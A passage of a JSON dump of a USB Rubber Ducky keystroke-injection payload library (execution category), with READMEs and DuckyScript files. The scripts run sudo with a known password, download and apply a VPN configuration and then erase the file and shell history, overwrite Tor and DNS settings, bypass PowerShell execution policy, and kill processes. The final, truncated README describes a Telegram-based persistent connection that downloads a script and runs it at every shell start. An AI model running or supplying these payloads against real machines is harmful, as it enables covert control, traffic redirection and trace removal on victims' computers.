EMAIL-ADDRESS\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nSTRING SUBJECT\nDELAY 500\nTAB\nDELAY 500\nSTRING MESSAGE\nDELAY 500\nCTRL ENTER\nDELAY 2000\nENTER\n\nREM # End actions\nDELAY 2000\nALT F4\nDELAY 1000\nALT F4\n" }, { "path": "payloads/library/execution/Send_Messages_In_Discord_Channel-Server/README.md", "content": "# Send Messages In Discord Channel-Server\n\nThis script can be used to send messages in a specific channel of a Discord text server.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to send messages in a specific channel of a Discord text server.\n\nOpen the GUI interface and trough this one open the Discord app, then use the keyboard shortcut CTRL-k to open the server chat.\n\n**Note** that if you want to send a message within a chat that has a very common name such as #general then be aware that it is very likely that the chat of the server in which you want to send the message will not be selected but some other. If, on the other hand, you want to send it in a chat with a somewhat more specific name such as wifi-pineapple (Hak5's text channel) then almost certainly the channel in which you wish to send the message will be selected.\n\n![](assets/1.png)\n![](assets/2.png)\n\n## Dependencies\n\n* Discord Installed\n* Internet connection\n\n## Settings\n\n- If, for example, the server is Hak5 and the channel in which you want to send the message is called wifi-pineapple then you should write just wifi-pineapple\n\n `[18] DEFINE #CHAT_NAME example`\n\n- This depends on the power of the computer and whether there are upgrades to be done\n\n `[27] DELAY 6000`\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt", "content": "REM ############################################################\nREM # |\nREM # Title : Send Messages In Discord Channel-Server |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10-11 |\nREM # |\nREM ############################################################\n\n\nREM Requirements:\nREM - Internet connection\nREM - Discord Installed\n\n\nREM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky\nDEFINE #CHAT_NAME example\n\n\nREM Open Discord app\nGUI\nDELAY 1000\nSTRINGLN Discord\n\nREM This depends on the power of the computer and whether there are upgrades to be done\nDELAY 6000\n\nREM Search by Discord keyboard shortcut and open it\nCTRL-k\nDELAY 500\nSTRINGLN #CHAT_NAME\nDELAY 500\n\nSTRINGLN_BLOCK\n Write here..\n your...\n messages...\nEND_STRINGLN\n\nALT F4\n" }, { "path": "payloads/library/execution/SetArbitraryVPN_Linux/README.md", "content": "# Set Arbitrary VPN - Linux ✅\n\nA script used to set an arbitrary VPN on a Linux machine.\n\n**Category**: Execution\n\n## Description\n\nA script used to set an arbitrary VPN on a Linux machine.\n\nOpens a shell, download the vpn file, set the vpn through openvpn, erase traces.\n\n## Getting Started\n\n### Dependencies\n\n* Permissions\n* Internet Connection\n* 'openvpn' installed\n\n### Settings\n\n* Set the VPN file link\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/SetArbitraryVPN_Linux/payload.txt", "content": "\nREM ####################################\nREM # |\nREM # Title : Set Arbitrary VPN |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Linux |\nREM # |\nREM ####################################\n\nREM Requirements:\nREM - Permissions\nREM - Internet Connection\nREM - 'openvpn' installed\n\nREM REQUIRED: You need to know the sudo password and replace 'example' with this\nDEFINE SUDO_PASS example\nREM REQUIRED: Set your VPN file configuration replacing example.com with your own link\nDEFINE VPN_FILE_LINK example.com\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\n\nREM #### PERMISSIONS SECTION ####\n\n\nSTRING sudo su\nENTER\nDELAY 1000\nSTRING SUDO_PASS\nENTER\nDELAY 1000\n\n\nREM #### VPN SECTION ####\n\n\nSTRING curl \nSTRING VPN_FILE_LINK\nSTRING > vpn_configuration.ovpn\nENTER\nREM It depends by the internet connection\nDELAY 2000\n\nSTRING openvpn vpn_configuration.ovpn\nREM It depends by the computer power\nDELAY 2000\n\n\nREM #### REMOVE TRACES ####\n\n\nSTRING rm vpn_configuration.ovpn\nENTER\nDELAY 500\n\nSTRING history -c\nENTER\nDELAY 500\n\nREM Exit from Sudo user\nSTRING exit\nENTER\nDELAY 500\n\nREM Close the shell\nSTRING exit\nENTER\n" }, { "path": "payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/README.md", "content": "# Set An Arbitrary And Persistent Tor Circuit\n\nThe \"Set An Arbitrary And Persistent Tor Circuit\" script is a payload designed to empower users to customize their Tor circuit according to their preferences using Duckyscript language. This payload provides the flexibility to set arbitrary Tor nodes and manually create a persistent circuit.\n\nThis script is highly versatile, as it is compatible with both Linux and Windows operating systems, thanks to the integration of the PASSIVE_WINDOWS_DETECT\\[[1](#sources)] extension, enabling automatic system detection. Although testing on MacOS was not possible, it is likely that the payload can also be used on this operating system. This extension includes its own passive detect ready optimizing execution times making the entire process more efficient.\n\nIt is essential to emphasize that the use of this script must comply with local laws and respect the privacy of others. The primary goal of \"Set An Arbitrary And Persistent Tor Circuit\" is to provide users with more direct control over their Tor connection, allowing them to customize and further enhance their online browsing experience.\n\n**Category**: Execution\n\n![1](assets/1.gif)\n\n*Dynamic visualization of the script in action. In this case I modified only the MiddleNode so that the persistence of the modification is shown but the full use of the payload results in immodifiability and persistence of all 3 nodes.*\n\n_**Note**: The nodes are unmodifiable unless the initial Tor settings are restored or unless the torrc file is subsequently modified by removing the configurations made._\n\n## Index\n\n- [Set An Arbitrary And Persistent Tor Circuit](#set-an-arbitrary-and-static-tor-circuit)\n- [Payload Description](#payload-description)\n- [Note](#note)\n- [Tor Configuration](#tor-configuration)\n- - [Description of the Tor Circuit](#description-of-the-tor-circuit)\n- - [Torrc Configuration File](#torrc-configuration-file)\n- [Tor University Challenge by EFF](#tor-university-challenge-by-eff) *Off-topic* \n- [Sources](#sources)\n- [Credits](#credits)\n\n## Payload Description\n\n**Requirements:**\n- Tor installed\n- Fingerprints of your relays\n\n**Notes:**\n- Payload tested using TorBrowser 13.0.8 based on Mozilla Firefox 115.6.0esr ENG\n- Payload tested on Windows 11_eng; Debian 12_eng; Ubuntu 23.10_eng;\n\nTo find fingerprints of various nodes you can go to https://metrics.torproject.org and set up a search based on what you are interested in such as country, node name, etc... For example if you try to search for '**Aleff**' it will send you to my [Tor Relay page](https://metrics.torproject.org/rs.html#details/B8C9DF8404FE175E37241774856907184A667ED2) (_Unless someone has created other Relays with the same name in the meantime_) where you can find the fingerprint information which is the data you are interested in.\n\n![](https://i.ibb.co/YN5515G/tor-node.png)\n\nThe script begins by defining the fingerprints of the entry, middle, and exit nodes using the `DEFINE` commands. Additionally, it provides instructions for activating administrator permissions, with specific considerations for systems like Debian and Ubuntu.\n\n**Configuration on Linux:**\n- If the operating system is Linux, the user must provide the command to obtain root privileges (`#root_permission_command`) as `sudo su` instead of `su` and the associated password (`#sudo_pass`).\n\n**Configuration on Windows:**\n- If the operating system is Windows, the script opens TorBrowser using Windows GUI commands.\n- Is not needed the root privileges\n- It overwrites all the old data with the new data defined at the beginning of the script.\n\nThe script aims to edit the Tor configuration process to ensure the specific use of entry, middle, and exit nodes. Users need to customize the node fingerprints and provide specific operating system information to ensure the correct operation of the script on the target platform.\n\nIn any case, the script is designed to completely overwrite the old configuration of the torrc file, so be very careful how you use it since it could be an irreversible change and could cause a loss of data.\n\n## Note\n\n- The payload is designed to run on a Windows or Linux system and requires Tor to be installed.\n- **#EntryNode**, **#MiddleNode**, **#ExitNode**: These variables must contain the fingerprint of the relays you want to use as nodes in your circuit.\n- **#root_permission_command**: Activation of administrator permissions may vary from system to system. For example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'. In general this can vary and is information that could be crucial in case the target has tampered with this functionality.\n- **#sudo_pass**: Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.\n- **#const_var**: Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.\n- **EXTENSION**: Through the use of the PASSIVE_WINDOWS_DETECT\\[[1](#sources)] extension, it is possible to detect the operating system on which the payload is launched, which, in this case, can be differentiated between Windows or any other operating system, which in our case corresponds to Linux. This powerful extension also allows you to determine when the system is ready to use since it includes the extension the passive Detect Ready. Using this extension not only makes it possible to use this payload dynamically on multiple systems, but also makes it extremely more efficient.\n\n## Tor Configuration\n\n![Tor](https://upload.wikimedia.org/wikipedia/commons/thumb/1/15/Tor-logo-2011-flat.svg/459px-Tor-logo-2011-flat.svg.png)\n\n### Description of the Tor Circuit\n\nThe Tor circuit is a fundamental component of the infrastructure that ensures anonymity and security in online communications. The Tor circuit consists of three types of nodes, each with a specific role: Entry Node, Middle Node, and Exit Node.\n\n![Tor Circuit](https://upload.wikimedia.org/wikipedia/commons/d/dc/Tor-onion-network.png)\n\n1. **Entry Node:**\n - The Entry Node is the first node in the Tor circuit.\n - When a user initiates a connection through Tor, the traffic is encrypted and sent to the Entry Node.\n - The Entry Node is aware of the user's IP address but cannot see the final destination of the traffic.\n - Its primary function is to pass it to the next node, so the Middle Node, without knowing the ultimate destination.\n\n2. **Middle Node:**\n - The Middle Node is the second node in the Tor circuit.\n - It receives encrypted traffic from the Entry Node and forwards it to the next node in the chain, which can be another Middle Node or the Exit Node.\n - The Middle Node is not aware of the user's IP address or the final destination of the traffic.\n - Its main function is to further enhance anonymity since it lacks information about the origin or destination of the traffic.\n\n3. **Exit Node:**\n - The Exit Node is the last node in the Tor circuit.\n - It receives encrypted traffic from the Middle Node and decrypts it before sending it to the final destination on the internet.\n - The Exit Node is aware of the destination address but does not know the user's IP address and the Entry Node in the same circuit.\n - Its primary function is to provide a point of exit for the traffic while maintaining the anonymity of the user.\n\n### Torrc Configuration File\n\nThe `torrc` configuration file is a crucial component of the Tor, governing the behavior and settings of the Tor network on a particular system. This plaintext configuration file is typically named \"torrc\" and is utilized to customize various aspects of Tor's operation. Here's an overview of the key elements found in the `torrc` file:\n\n1. **Entry, Middle, and Exit Nodes Configuration:**\n - Users can specify the fingerprints or identities of preferred Entry, Middle, and Exit nodes using directives like `EntryNodes`, `MiddleNodes`, and `ExitNodes`. This allows users to influence the selection of these nodes in their Tor circuit for enhanced control or security. *This functionality is used in this payload.*\n\n2. **General Tor Configuration:**\n - The `torrc` file includes parameters for configuring the general behavior of Tor. This may involve settings such as the port on which Tor listens, bandwidth limits, logging preferences, and whether the system should act as a relay or only as a client.\n\n3. **Bridge Configuration:**\n - For users in regions with restricted access to the Tor network, the `torrc` file allows the configuration of bridge relays. Bridge relays help users bypass censorship by providing an alternative entry point to the Tor network.\n\n4. **Hidden Service Configuration:**\n - Users hosting Tor hidden services can configure their services through the `torrc` file. This includes defining the service's port, authentication methods, and other related parameters.\n\n5. **Logging and Debugging:**\n - The file provides options for configuring logging levels and debugging information. Users can tailor the amount of detail Tor logs, facilitating troubleshooting and analysis.\n\n6. **Security Settings:**\n - Various security-related options can be configured in the `torrc` file, such as restricting certain features or specifying the behavior of Tor in response to specific security events.\n\n7. **Network and Protocol Settings:**\n - Users can fine-tune Tor's network and protocol settings in the `torrc` file, influencing aspects such as circuit creation, DNS resolution, and transport protocols.\n\nCustomizing the `torrc` file allows users to tailor Tor's behavior to their specific needs and security requirements. However, users should exercise caution and adhere to Tor's best practices to ensure the continued effectiveness and anonymity of their Tor usage.\n\n> See the [sources](#sources) section for more on this topic.\n\n## Tor University Challenge by EFF\n\n*Off-Topic*\n\n![](https://www.eff.org/files/banner_library/banner-tor-monions.png)\n\nTor is a valuable tool for browsing the web anonymously, but since it's powered by volunteers willing to share some bandwidth and a computer, it's always in need of additional help. Which is why EFF is announcing the Tor University Challenge, a project asking universities to start running Tor relays on campus. Today, we're launching with support from 12 universities. With your help, we can add more universities to strengthen the Tor network to improve one of the best free privacy tools available today.\n\n*Source: https://www.eff.org/deeplinks/2023/08/announcing-tor-university-challenge*\n\n> If you are interested in finding out more about Tor and EFF's initiative, you can learn more at the official page of [Tor University Challenge](https://toruniversity.eff.org/).\n\n## Sources\n\n1. Passive Windows Detect - https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt\n2. Select the relays - https://metrics.torproject.org/rs.html\n3. torrc - https://support.torproject.org/glossary/torrc/\n4. Official torrc documentation and so on - https://2019.www.torproject.org/docs/tor-manual.html.en\n5. Tor University Challenge - https://toruniversity.eff.org/\n\n\n## Credits\n\n

Aleff

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt", "content": "REM_BLOCK\n################################################################\n# |\n# Title : Set An Arbitrary And Persistent Tor Circuit |\n# Author : Aleff |\n# Version : 1.0 |\n# Category : Execution |\n# Target : Windows 10/11; Linux; |\n# |\n################################################################\n\nRequirements:\n - Tor installed\n - Fingerprints of your relays\n\nNote:\n - Payload tested using TorBrowser 13.0.8 based on Mozilla Firefoz 115.6.0esr ENG\n - Payload tested on Windows 11_eng; Debian 12_eng; Ubuntu 23.10_eng;\nEND_REM\n\nREM Set the Fingerprints here\nDEFINE #EntryNode example\nDEFINE #MiddleNode example\nDEFINE #ExitNode example\n\nREM_BLOCK\nActivation of administrator permissions may vary from system to system.\nFor example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'.\nIn general this can vary and is information that could be crucial in case the target has tampered with this functionality.\nEND_REM\nDEFINE #root_permission_command sudo su\n\nREM Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.\nDEFINE #sudo_pass example\n\nREM Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.\nDEFINE #const_entry_node EntryNodes\nDEFINE #const_middle_node MiddleNodes\nDEFINE #const_exit_node ExitNodes\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\nEND_EXTENSION\n\nIF ($_OS == WINDOWS) THEN\n REM Open the TorBrowser path\n GUI\n DELAY 500\n STRINGLN tor browser\n RIGHTARROW\n DOWNARROW\n DOWNARROW\n ENTER\n SHIFT F10\n DELAY 500\n DOWNARROW\n DOWNARROW\n ENTER\n REM Search and open the torrc config file\n CTRL f\n DELAY 500\n STRING torrc\n DELAY 1500\n DOWNARROW\n SPACE\n ENTER\n TAB\n ENTER\n REM Delete all the previous data with the arbotrary nodes\n CTRL a\n DELETE\n STRINGLN\n #const_entry_node #EntryNode\n #const_middle_node #MiddleNode\n #const_exit_node #ExitNode\n END_STRINGLN\n CTRL s\n ALT F4\n ALT F4\nELSE\n REM Opens a new terminal and login with administrator permissions.\n CTRL-ALT t\n STRINGLN #root_permission_command\n DELAY 500\n STRING #sudo_pass\n DELAY 1000\n REM Writes the new configuration into the torrc file deleting all the previous settings.\n STRINGLN\n echo \"#const_entry_node #EntryNode\n #const_middle_node #MiddleNode\n #const_exit_node #ExitNode\" > /etc/tor/torrc\n END_STRINGLN\n REM Then exit from the super user and close the terminal\n DELAY 500\n STRINGLN exit\n ALT F4\nEND_IF\n" }, { "path": "payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md", "content": "# Set An Arbitrary DNS (IPv4 version)\n\nThis script can be used to change the default DNS server in Windows 11.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to change the default DNS server in Windows 11.\n\nThe script open the settings, then go to network settings, then go to wi-fi settings, then go to hardware properties settings, the open the dns settings, then change to manual, then set the DNS server defined before, then save the settings changed and close the window.\n\n- You must edit the DNS defining the IPv4 in the payload.txt file\n\n```DuckyScript\nREM DNS IPv4 like Cloudflare DNS 1.1.1.1\nDEFINE DNS example\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt", "content": "REM ########################################################\nREM # |\nREM # Title : Set An Arbitrary DNS (IPv4 version) |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 11 |\nREM # |\nREM ########################################################\n\n\nREM Requirements:\nREM - Nothing\n\n\nREM DNS IPv4 like Cloudflare DNS 1.1.1.1\nDEFINE DNS example\n\n\nREM Open Settings\nDELAY 1000\nGUI\nDELAY 1000\nSTRING settings\nDELAY 1000\nENTER\n\nREM Go to network settings\nDELAY 1000\nDOWNARROW\nDELAY 500\nDOWNARROW\nDELAY 500\nDOWNARROW\nDELAY 500\nENTER\n\nREM Go to Wi-Fi settings\nDELAY 1000\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Go to hardware properties settings\nDELAY 1000\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM DNS Settings\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Change to manual\nDELAY 1000\nSPACE\nDELAY 500\nDOWNARROW\nDELAY 500\nENTER\n\nREM Set the DNS server\nDELAY 1000\nTAB\nDELAY 500\nSPACE\nDELAY 500\nTAB\nDELAY 500\nSTRING DNS\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Save settings\nDELAY 1000\nDOWNARROW\nDELAY 500\nENTER\nDELAY 1000\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\nDELAY 500\nALT F4\n" }, { "path": "payloads/library/execution/Set_Tor_Bridge_In_Windows/README.md", "content": "# Set Tor Bridge in Windows\n\nIntroducing the \"Set Tor Bridge in Windows\" payload a DuckyScript payload designed for USB Rubber Ducky. This versatile payload empowers users to manually configure Tor bridges, enabling the selection of any bridge of their choice. With the ease of customization, users can redefine their Tor experience by setting bridges in a way that suits their preferences. This payload not only provides flexibility but also enhances user control over their Tor network settings.\n\n> In Tor, a \"bridge\" is a server used as an intermediary to help users connect to the Tor network more securely and bypass any restrictions or censorship on accessing Tor. Bridges are often employed when direct access to Tor is blocked or monitored by a firewall or censorship system.\n>\n> Essentially, when using a bridge, the initial connection is made through the bridge instead of through a standard Tor entry node. This makes it more challenging for censors to identify and block Tor traffic, as the traffic through the bridge appears like regular, non-Tor traffic.\n>\n> Bridges can be manually configured in the Tor client settings, allowing users to overcome restrictions and access the Tor network in situations where it might otherwise be prevented.\n\n*Source: What is a bridge\\[[2](#sources)]*\n\n**Category**: Execution\n\n## Index\n\n- [Set Tor Bridge in Windows](#set-tor-bridge-in-windows)\n- [Payload Description](#payload-description)\n- [Note](#note)\n- [Sources](#sources)\n- [Credits](#credits)\n\n## Payload Description\n\nThe following DuckyScript payload is designed to execute a series of commands using the TorBrowser. It requires Tor to be installed before running. Here's a description of the payload's behavior:\n\n1. Opens the Start menu by pressing the GUI (Windows) key.\n2. Types \"TorBrowser\" and presses Enter to launch the TorBrowser.\n3. Executes a sequence of key presses to navigate in the browser:\n \n a. Presses ALT\n \n b. Then 2 times the Left Arrow to position yourself on the \"Tools\" item\n\n c. Presses ENTER to open the menu\n\n d. Up Arrow and ENTER to open the settings page\n\n e. Write the contstant \"Add a new Bridge\" to search the bridge section\n \n f. Now the ALT TAB command combination is repeated 12 times. It is seemingly counterintuitive to go backwards, but this strategy allows the use of this payload to be generalized in that it does not change whether other active bridges are already present.\n \n h. Presses Enter to open the Manual Bridge area.\n5. Moves the cursor to the text area (TAB).\n6. Writes the contents of the variables #BRIDGE, #BRIDGE-N, multiple bridges can be entered.\n7. Saves the new settings and closes\n8. Closes the TorBrowser using the ALT F4 key combination.\n\n## Note\n\n- The payload is designed to run on a Windows system and requires Tor to be installed.\n- The variable #BRIDGE is defined at the beginning of the payload to allow the user to specify their own bridge.\n- Ensure that the key sequences are adapted to the specific version of the TorBrowser in use.\n- The payload incorporates the DETECT_READY\\[[1](#sources)] extension to optimize the system's wait before starting the TorBrowser and executing subsequent operations. This approach aims to ensure that each step of the payload is executed only when the system is fully ready, contributing significantly to overall execution efficiency.\n\n## Sources\n\n1. Detect Ready - Smarter Initial Delays for Keystroke Injection Attacks with the USB Rubber Ducky - https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready\n2. What is a bridge? - https://support.torproject.org/censorship/censorship-7/\n\n## Credits\n\n

Aleff

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt", "content": "REM ###################################\nREM # |\nREM # Title : Set Tor Bridge |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 |\nREM # |\nREM ###################################\n\nREM Requirements:\nREM - Tor installed\n\nREM Note:\nREM - Payload tested using TorBrowser 13.0.8 based on Mozilla Firefoz 115.6.0esr ENG\n\nREM Set your own bridge(s) here\nDEFINE #BRIDGE example\nDEFINE #BRIDGE-N example-n\n\nEXTENSION DETECT_READY\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n\n TARGETS:\n Any system that reflects CAPSLOCK will detect minimum required delay\n Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms\n END_REM\n\n REM CONFIGURATION:\n DEFINE #RESPONSE_DELAY 25\n DEFINE #ITERATION_LIMIT 120\n\n VAR $C = 0\n WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))\n CAPSLOCK\n DELAY #RESPONSE_DELAY\n $C = ($C + 1)\n END_WHILE\n CAPSLOCK\nEND_EXTENSION\n\nGUI\nDELAY 500\nSTRING tor browser\nENTER\nDELAY 1000\n\nALT\n\nVAR $FOO = 2\nWHILE ( $FOO > 0 )\n LEFTARROW\n $FOO = ( $FOO - 1 )\nEND_WHILE\n\nENTER\n\nUPARROW\n\nENTER\n\nDELAY 500\n\nSTRING Add a new Bridge\n\n$FOO = 12\nWHILE ( $FOO > 0 )\n ALT TAB\n $FOO = ( $FOO - 1 )\nEND_WHILE\n\nENTER\n\nTAB\n\nSTRINGLN #BRIDGE\nSTRINGLN #BRIDGE-N\n\nTAB\n\nENTER\n\nDELAY 500\n\nALT F4\n" }, { "path": "payloads/library/execution/Simple_PSH_Wallpaper_Changer/Payload.txt", "content": "REM Wallpaper Changer\nREM H4ck1ngM4rk\nREM Downloads a picture and set it as wallpaper, gets Visible after Restart or Relogin\nREM Tested on Windows 11 PRO\n\nEXTENSION DETECT_READY\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n\n TARGETS:\n Any system that reflects CAPSLOCK will detect minimum required delay\n Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms\n END_REM\n\n REM CONFIGURATION:\n DEFINE #RESPONSE_DELAY 25\n DEFINE #ITERATION_LIMIT 120\n\n VAR $C = 0\n WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))\n CAPSLOCK\n DELAY #RESPONSE_DELAY\n $C = ($C + 1)\n END_WHILE\n CAPSLOCK\nEND_EXTENSION\n\n\nDEFINE URL example.com\nREM The URL to get the Picture from\nDEFINE PATH $home\\XXX.jpg\nREM Define where to store the Picture\nGUI x\nDELAY 100\nSTRING i\nDELAY 750\nSTRING Invoke-WebRequest https://\nSTRING URL\nSPACE\nSTRING -OutFile\nSPACE\nSTRING PATH\nSTRING ; reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"\nSTRING PATH\nSTRINGLN \" /f; RUNDLL32.EXE USER32.DLL ,UpdatePerUserSystemParameters ,1 ,True;exit;\n" }, { "path": "payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md", "content": "# Starting a PowerShell with administrator permissions in Windows 10/11\n\nThis script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.\n\n**Category**: Execution\n\n## Description\n\nThis script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.\n\nStarting a PowerShell session with administrator privileges means the session has access to features and operations that require high permissions on the Windows operating system.\n\nSome PowerShell commands require administrator privileges to run properly. Starting PowerShell as an administrator allows you to execute commands that require elevated permissions, such as managing system services, changing security settings, creating or modifying user accounts, installing system-level software, and so on.\n\nIt is important to note that running PowerShell with administrator privileges involves a higher level of responsibility and can cause significant changes to the system. Therefore, it is advisable to be careful and fully understand the effects of operations performed in a session with administrator privileges to avoid unwanted or harmful changes.\n\n## Dependencies\n\n* Nothing\n\n## Example\n\n- `STRINGLN Get-ExecutionPolicy -List`\n![](docs/1.png)\n\n- `STRINGLN Set-ExecutionPolicy Bypass`\n![](docs/2.png)\n\n- `STRINGLN Get-ExecutionPolicy -List`\n![](docs/3.png)\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt", "content": "REM ####################################################################################\nREM # |\nREM # Title : Starting a PowerShell with administrator permissions in Windows |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10-11 |\nREM # |\nREM ####################################################################################\n\nREM Requirements:\nREM - Nothing\n\nDELAY 1000\nGUI x\nDELAY 500\nSTRING a\nDELAY 500\nLEFT_ARROW\nDELAY 500\nENTER\n\nDELAY 2000\nSTRINGLN Get-ExecutionPolicy -List\nDELAY 500\nSTRINGLN Set-ExecutionPolicy Bypass\nDELAY 500\nSTRINGLN Get-ExecutionPolicy -List\nDELAY 500\n\nALT F4\n" }, { "path": "payloads/library/execution/Stop_A_Single_Process_In_Windows/README.md", "content": "# Stop A Single Process In Windows\n\nThis script can be used to quickly stop an active process on a windows machine.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to quickly stop an active process on a windows machine.\n\nThis script open the Task Manager app, then go to search bar, then write the process name that want to be stopped, open the right click mouse menu and click the end task option, then close the task manager app.\n\n## Dependencies\n\n* Nothing\n\n## Settings\n\n- Write the name of the process that you want to stop \n \n `DEFINE PROCESS_NAME example`\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt", "content": "\nREM #####################################################\nREM # |\nREM # Title : Stop A Single Process In Windows |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 |\nREM # |\nREM #####################################################\n\n\nREM Requirements:\nREM - Nothing\n\n\nREM Write the name of the process that you want to stop \nDEFINE PROCESS_NAME example\n\n\nREM Open Task Manager\nGUI\nDELAY 1000\nSTRING Task Manager\nENTER\nDELAY 1000\n\nREM Goto search bar\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\n\nREM Write the process name\nSTRING PROCESS_NAME\nDELAY 500\nENTER\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\n\nREM Open the menu and close it ending the task\nSHIFT F10\nDELAY 500\nDOWNARROW\nDELAY 500\nDOWNARROW\nDELAY 500\nENTER\nDELAY 2000\n\nREM Close the task manager\nALT F4\n" }, { "path": "payloads/library/execution/Telegram_Persistent_Connection_Linux/README.md", "content": "# Telegram Persistent Connection\n\nA script used to configure a persistent connection on a Linux computer through a pre-configured Telegram Bot.\n\n**Category**: Execution\n\n## Description\n\nA script used to configure a persistent connesction on a Linux computer through a pre-configured Telegram Bot.\n\nOpens a shell, download the python script through the `curl` command outputing the file into a `connection.py` file using `-o` option, then run it and set the run of the program as a default command every times a shell is runned.\n\nThis payload is intended as a basic reference point for developing payloads on a persistent connection Telegram based.\n\n## Getting Started\n\n### Dependencies\n\n* Internet Connection\n\n### Settings\n\n- **Telegram Bot**: You should configure a bot through Telegram. If you don't know how to do this, follow the guide 